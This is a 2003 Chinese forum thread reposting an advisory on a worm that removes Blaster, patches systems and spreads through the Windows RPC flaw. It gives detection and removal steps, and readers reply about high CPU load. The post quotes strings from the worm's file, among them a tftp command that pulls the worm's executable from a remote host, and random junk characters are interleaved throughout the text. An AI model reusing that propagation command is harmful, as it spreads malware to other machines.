下沙论坛

标题: [转帖]最新RPC漏洞病毒.关于最近的疯狂ping [打印本页]

作者: 自由居居士    时间: 2003-8-30 22:50
标题: [转帖]最新RPC漏洞病毒.关于最近的疯狂ping
该病毒的特点是将“冲击波”(Worm.Blaster)病
! f( q/ [4 I% R" }; G$ ?
2 y2 t* M. R) W/ ~' r毒干掉,并在系统内值入,预防冲击波病毒的疫苗。+ ~7 C& u  t; V* K
% j3 N2 U  I4 O$ i! |
然后这个新病毒会尝试从微软网站下载补丁并自动将受感染的系统打上补丁。然2 E% M$ [5 H0 r
% C% z& X- E$ f
后该病毒会开启数百个的线程PING其它IP地址,并通过RPC漏洞快速传播自己,+ b. E+ A% d$ S! q
; `; |# Y* A9 H/ g
消耗大量CPU和网络资源,并且有可能会导致系统死机。该病毒的作者似乎无意( x; E9 a0 s2 V1 i

0 b) \+ C  Y4 n作恶,病毒设定在2004年自行毁灭。
) i, {1 h* {1 W
: I# N( M) N9 [0 F; K由于该病毒采用PING方式进行探测,只感染能够PING通的机器,因此广大用户,
3 F+ M+ l9 J1 D% a) |8 V! A0 J* N! ^+ ?6 ^  U' F
设置防火墙的规则,禁止ping,这样可以有效防止该病毒的入侵。# j4 |4 f8 ^0 \: x# u7 \9 n  f% |
! Z( |% z$ A2 L4 Y8 Y
9 ^7 @! ?! l  U
如果大家在自己 的system32 目录里的WINS目录里发现DLLHOST.EXE 和SVCHOST.EXE那么你肯定中毒了。。请自己在启动里删除。。并且删除这2个文件。。传染比较快。。希望大家安装防护墙,,这是中国人自己编译的病毒
$ `+ ?9 m- |$ y$ Y  ~* O
" z' p! [7 Y% ZSVCHOST.EXE 大小是19.2K
( F& E+ P1 d( Z4 {DLLHOST.EXE 大小是10.K
5 k$ Z% x% h) l% w9 N
& y" B% d& \2 c) KDLLHOST.EXE里面有这样的话!
! j0 A) S( d& M. u/ N
7 F8 O6 n" r# B9 C7 d
. O6 L& I. v' }- d引用:+ _; q2 G& Y* z. `; g% f/ q
4 Y  R* W( m0 H, J
=========== I love my wife & baby ~~~ Welcome Chian~~~ Notice: 2004 will remove myself~~ sorry zhongli~~~=========== wins http://download.microsoft.com/downl...980-x86-KOR.exe ; http://download.microsoft.com/downl...980-x86-CHT.exe ; http://download.microsoft.com/downl...980-x86-CHS.exe ; http://download.microsoft.com/downl...980-x86-ENU.exe ; http://download.microsoft.com/downl...980-x86-KOR.exe ; http://download.microsoft.com/downl...980-x86-CHT.exe ; http://download.microsoft.com/downl...980-x86-CHS.exe ; http://download.microsoft.com/downl...980-x86-ENU.exe ; tftp -i %s get svchost.exe wins\SVCHOST.EXE
4 P& g9 M* i- \4 ^9 G, ]
$ s' {- s/ F( M" U这2个文件在在:%Windir%\system32\wins\目录里..(注意:不是:%Windir%\system32\..)
2 C1 {* m; m+ L; h1 X4 x- l# Z$ T% F# d/ {& g2 q3 _
( P8 B: x5 j; T. |
紧急解决方案:
/ E6 X! e. P! K1 |0 j! [. q停止一下两个服务:
2 N, ?2 A- C6 |3 L3 \/ j1 s7 ~' O5 u+ t
Network connections Sharing9 x& C3 i3 S! X) M
WINS Client5 e4 i8 V! e7 b9 f4 i" d

; V+ W- G0 Q0 G在:%Windir%\system32\wins\ 3 |: O) I# m) [' `
目录下删除:4 R% x5 s# V$ ~2 _
- R9 V0 _- I, i+ P
SVCHOST.EXE
) r, Y) x8 \. [1 l! q: kDLLHOST.EXE 2 \6 y4 d& Y8 t: l

: [( a/ K& |8 w' c2 T$ I这两个文件,安装防火墙,并禁止PING。
& w: D# r, M/ ~( k2 r( j
作者: 猴子很忙    时间: 2003-8-31 12:08
防火墙跳个不停
作者: wtuje    时间: 2003-9-7 08:59
请问,要是我要共享,又要不受这病毒,那该怎么办,因为我们是共享上网的
作者: 带你去看海    时间: 2003-9-7 09:34
提示: 作者被禁止或删除 内容自动屏蔽
作者: sai    时间: 2003-9-7 10:03
提示: 作者被禁止或删除 内容自动屏蔽
作者: wtuje    时间: 2003-9-7 12:35
唉,没用的,我改到了2005,还是这样 ,要卡的,CPU利用率到快一百了,,我不共享马上就好了,有没有别的办法啊
作者: 自由居居士    时间: 2003-9-7 15:18
看来还是取消网络共乡有效啊~~
作者: 煎饼    时间: 2003-9-7 21:31
删除染毒文件,安装补丁,然后安装天网防火墙,这样就不会再次感染




欢迎光临 下沙论坛 (http://bbs.xiasha.cn/) Powered by Discuz! X3.3